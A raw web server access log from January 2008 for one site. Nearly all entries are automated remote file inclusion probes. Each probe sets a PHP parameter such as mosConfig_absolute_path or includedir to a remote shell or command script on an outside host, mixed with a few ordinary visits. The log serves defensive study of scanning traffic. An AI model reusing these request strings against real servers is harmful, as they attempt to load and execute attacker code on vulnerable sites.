208.186.169.183 - - [18/Jan/2008:11:02:28 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:11:02:28 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:11:02:28 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
8.6.223.16 - - [18/Jan/2008:11:02:37 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=%20http://www.alfastyle.ro/red/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
8.6.223.16 - - [18/Jan/2008:11:02:38 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=%20http://www.alfastyle.ro/red/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.67.237.143 - - [18/Jan/2008:11:03:25 -0800] "GET /logs/access_071229.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [18/Jan/2008:11:03:25 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [18/Jan/2008:11:03:26 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.157.182.9 - - [18/Jan/2008:11:03:45 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:11:05:30 -0800] "GET /logs/access_071230.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:11:06:15 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:11:06:15 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:11:06:15 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:11:06:16 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:11:07:06 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:11:07:06 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:11:07:06 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:11:07:06 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
203.157.182.9 - - [18/Jan/2008:11:07:22 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [18/Jan/2008:11:07:23 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [18/Jan/2008:11:07:24 -0800] "GET /logs//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 30687 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:11:10:01 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:11:10:01 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
208.179.126.38 - - [18/Jan/2008:11:10:01 -0800] "GET /logs/access_071229.log//zero_vote/error.php%3fdir=http://www.gilmores.ie//administrator/components/com_chronocontact/id[1].txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:11:10:04 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:11:10:05 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
91.142.210.125 - - [18/Jan/2008:11:11:09 -0800] "GET /logs/access_071229.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.210.125 - - [18/Jan/2008:11:11:10 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [18/Jan/2008:11:11:55 -0800] "GET /logs/access_080101.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [18/Jan/2008:11:11:56 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [18/Jan/2008:11:11:56 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.227.166.118 - - [18/Jan/2008:11:12:33 -0800] "GET /bikes/GPS/WeSTOC2006/ HTTP/1.1" 200 849 "http://www.st-owners.com/forums/showthread.php?p=368123#post368123" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)" "www.dmulk.com"
71.227.166.118 - - [18/Jan/2008:11:12:34 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)" "www.dmulk.com"
85.31.186.231 - - [18/Jan/2008:11:13:15 -0800] "GET /logs/access_071230.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.158.50 - - [18/Jan/2008:11:13:44 -0800] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
86.54.106.194 - - [18/Jan/2008:11:14:53 -0800] "GET /logs/access_071229.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://phpmaster.evolink.ro/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.54.106.194 - - [18/Jan/2008:11:14:54 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://phpmaster.evolink.ro/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.3.98 - - [18/Jan/2008:11:15:21 -0800] "GET /!scanhttp://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.29.16.18 - - [18/Jan/2008:11:15:52 -0800] "GET /logs/access_071229.log//zero_vote/error.php%3fdir=http://www.gilmores.ie//administrator/components/com_chronocontact/id[1].txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:11:18:04 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:11:18:04 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:11:18:04 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.100.191.98 - - [18/Jan/2008:11:18:24 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.100.191.98 - - [18/Jan/2008:11:18:24 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.100.191.98 - - [18/Jan/2008:11:18:24 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:11:20:18 -0800] "GET /logs/access_071229.log//zero_vote/error.php%3fdir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:11:20:18 -0800] "GET /logs/access_071229.log//zero_vote/error.php%3fdir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:11:20:19 -0800] "GET //zero_vote/error.php%3fdir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:11:20:19 -0800] "GET //zero_vote/error.php%3fdir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:11:20:19 -0800] "GET /logs//zero_vote/error.php%3fdir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:11:20:19 -0800] "GET /logs//zero_vote/error.php%3fdir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.189.225.85 - - [18/Jan/2008:11:21:13 -0800] "GET /logs/access_071230.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.189.225.85 - - [18/Jan/2008:11:21:13 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.189.225.85 - - [18/Jan/2008:11:21:17 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:11:22:41 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:11:22:41 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:11:22:41 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:11:22:58 -0800] "GET /logs/access_080101.log/index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:11:22:58 -0800] "GET /index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:11:22:59 -0800] "GET /logs/index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.3.98 - - [18/Jan/2008:11:23:00 -0800] "GET /logs/access_071225.log/!scanhttp://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.3.98 - - [18/Jan/2008:11:23:01 -0800] "GET /logs/!scanhttp://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.194.149.28 - - [18/Jan/2008:11:24:09 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.100.191.98 - - [18/Jan/2008:11:24:20 -0800] "GET /logs/access_080101.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.3.98 - - [18/Jan/2008:11:25:17 -0800] "GET /logs/access_071230.log/!scanhttp://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:11:26:47 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:11:26:47 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [18/Jan/2008:11:26:47 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.240.103 - - [18/Jan/2008:11:28:00 -0800] "GET //send_reminders.php?noSet=http://www.strider.we.bs/scan/cmd-scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [18/Jan/2008:11:28:05 -0800] "GET /logs/access_080101.log/akocomments.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [18/Jan/2008:11:28:05 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [18/Jan/2008:11:28:06 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.49.228 - - [18/Jan/2008:11:28:41 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
67.19.49.228 - - [18/Jan/2008:11:28:41 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
64.38.4.3 - - [18/Jan/2008:11:28:44 -0800] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.51.42.202 - - [18/Jan/2008:11:31:48 -0800] "GET /index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.crownvisioncenter.com/random/visioncenter/_notes/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
72.51.42.202 - - [18/Jan/2008:11:31:48 -0800] "GET /logs/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.crownvisioncenter.com/random/visioncenter/_notes/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
41.206.160.2 - - [18/Jan/2008:11:32:03 -0800] "GET /logs/access_071229.log///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.206.160.2 - - [18/Jan/2008:11:32:05 -0800] "GET ///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 2963 "-" "libwww-perl/5.805" "www.dmulk.com"
41.206.160.2 - - [18/Jan/2008:11:32:11 -0800] "GET /logs///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 30688 "-" "libwww-perl/5.805" "www.dmulk.com"
62.50.15.90 - - [18/Jan/2008:11:32:34 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.28.18.46 - - [18/Jan/2008:11:36:39 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://openair.infinite-server.de/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.189.225.85 - - [18/Jan/2008:11:36:59 -0800] "GET /logs/access_071222.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.venezia2.it/vesportal/forum/uploads/avatars/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.70.198 - - [18/Jan/2008:11:39:22 -0800] "GET /logs/access_071214.log/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.70.198 - - [18/Jan/2008:11:39:22 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.70.198 - - [18/Jan/2008:11:39:23 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.4.3 - - [18/Jan/2008:11:39:59 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [18/Jan/2008:11:39:59 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [18/Jan/2008:11:39:59 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.238.199.72 - - [18/Jan/2008:11:40:52 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.14.194 - - [18/Jan/2008:11:42:27 -0800] "GET //send_reminders.php?noSet=http://www.strider.we.bs/scan/cmd-scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.126.106 - - [18/Jan/2008:11:43:53 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.28 - - [18/Jan/2008:11:44:26 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.28 - - [18/Jan/2008:11:44:26 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.98.160 - - [18/Jan/2008:11:44:37 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.40.113.21 - - [18/Jan/2008:11:45:06 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
212.40.113.21 - - [18/Jan/2008:11:45:06 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://jatekfejlesztes.lap.hu/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
64.91.244.2 - - [18/Jan/2008:11:45:22 -0800] "GET /logs/access_071214.log/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:11:54:23 -0800] "GET /logs/access.log//send_reminders.php?noSet=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:11:54:23 -0800] "GET //send_reminders.php?noSet=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:11:54:24 -0800] "GET /logs//send_reminders.php?noSet=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.240.103 - - [18/Jan/2008:11:55:07 -0800] "GET /logs/access.log//send_reminders.php?noSet=http://www.strider.we.bs/scan/cmd-scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [18/Jan/2008:11:55:07 -0800] "GET /logs//send_reminders.php?noSet=http://www.strider.we.bs/scan/cmd-scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.240.66 - - [18/Jan/2008:11:56:46 -0800] "GET /logs/access_071229.log//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.240.66 - - [18/Jan/2008:11:56:47 -0800] "GET /logs/access_071229.log//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:11:56:58 -0800] "GET /logs/access_071229.log/index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.94.1.95 - - [18/Jan/2008:11:59:19 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:11:59:27 -0800] "GET /logs/access_071229.log/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:11:59:27 -0800] "GET /index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:11:59:28 -0800] "GET /logs/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
